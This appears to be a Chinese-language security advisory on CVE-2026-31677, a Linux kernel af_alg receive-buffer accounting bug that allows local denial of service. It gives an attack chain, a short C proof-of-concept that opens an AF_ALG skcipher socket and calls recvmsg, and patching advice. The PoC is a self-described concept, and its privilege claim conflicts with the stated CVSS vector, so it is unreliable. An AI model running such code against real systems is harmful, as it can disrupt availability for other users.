CVE-2026-31677 CVSS 5.5 中危

CVE-2026-31677 Linux内核af_alg模块资源管理漏洞

披露日期: 2026-04-25

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31677

漏洞类型

资源管理错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的crypto/af_alg组件存在资源管理漏洞。af_alg_get_rsgl()函数在提取RX分散列表（SG）数据时，未根据剩余的接收缓冲区预算进行限制，仅使用af_alg_readable()作为门控。这导致接收端计费与实际附加到请求的数据量不匹配。当skcipher无法获取足够的RX空间处理数据块时，系统可能拒绝recvmsg调用，影响系统可用性。

技术细节

该漏洞位于Linux内核的crypto子系统，具体涉及af_alg模块的接收逻辑。正常情况下，af_alg_get_rsgl()应确保提取的数据量不超过af_alg_rcvbuf(sk)定义的接收缓冲区预算。然而，由于缺少对剩余预算的严格限制，攻击者可以通过精心构造的数据流利用此缺陷。当skcipher（对称密钥密码接口）在处理数据时，如果无法为至少一个数据块获取足够的RX空间，旧逻辑会尝试将请求长度向下舍入为零，而不是正确处理错误。这种逻辑缺陷可能导致内存计费混乱，进而被利用造成拒绝服务攻击。

攻击链分析

STEP 1

1. 本地访问

攻击者需要获取目标系统的本地低权限访问权限。

STEP 2

2. 创建AF_ALG套接字

利用本地权限创建并绑定到Linux内核的AF_ALG接口， specifically skcipher type。

STEP 3

3. 构造恶意数据流

向套接字发送特定大小的数据，旨在操纵接收缓冲区预算的计数逻辑。

STEP 4

4. 触发漏洞

调用recvmsg请求数据，由于af_alg_get_rsgl()未正确限制提取量，触发拒绝调用或DoS条件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC Concept for CVE-2026-31677
 * This code demonstrates how to interact with AF_ALG to potentially trigger the buffer logic.
 * Requires root or appropriate privileges to execute.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>

#define AF_ALG 38

int main() {
    int tfm_fd, sock_fd;
    struct sockaddr_alg sa = {
        .salg_family = AF_ALG,
        .salg_type = "skcipher",
        .salg_name = "cbc(aes)"
    };
    char buf[32];
    struct iovec iov;
    struct msghdr msg;

    // 1. Create algorithm socket
    tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (tfm_fd < 0) {
        perror("socket");
        return 1;
    }

    // 2. Bind to specific cipher
    if (bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        close(tfm_fd);
        return 1;
    }

    // 3. Accept connection
    sock_fd = accept(tfm_fd, NULL, 0);
    if (sock_fd < 0) {
        perror("accept");
        close(tfm_fd);
        return 1;
    }

    // 4. Send data to fill/trigger buffer logic
    // In a real exploit, specific sizes would be used to hit the budget check.
    memset(buf, 'A', sizeof(buf));
    if (send(sock_fd, buf, sizeof(buf), 0) < 0) {
        perror("send");
    }

    // 5. Attempt recvmsg to trigger the bug condition
    memset(&msg, 0, sizeof(msg));
    iov.iov_base = buf;
    iov.iov_len = sizeof(buf);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    
    // This might trigger the rejection logic if buffer conditions are met
    recvmsg(sock_fd, &msg, 0);

    close(sock_fd);
    close(tfm_fd);
    printf("PoC execution completed.\n");
    return 0;
}

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

建议立即更新Linux内核到最新稳定版本。如果无法立即更新，可以通过限制本地用户权限或禁用不必要的加密算法接口来降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表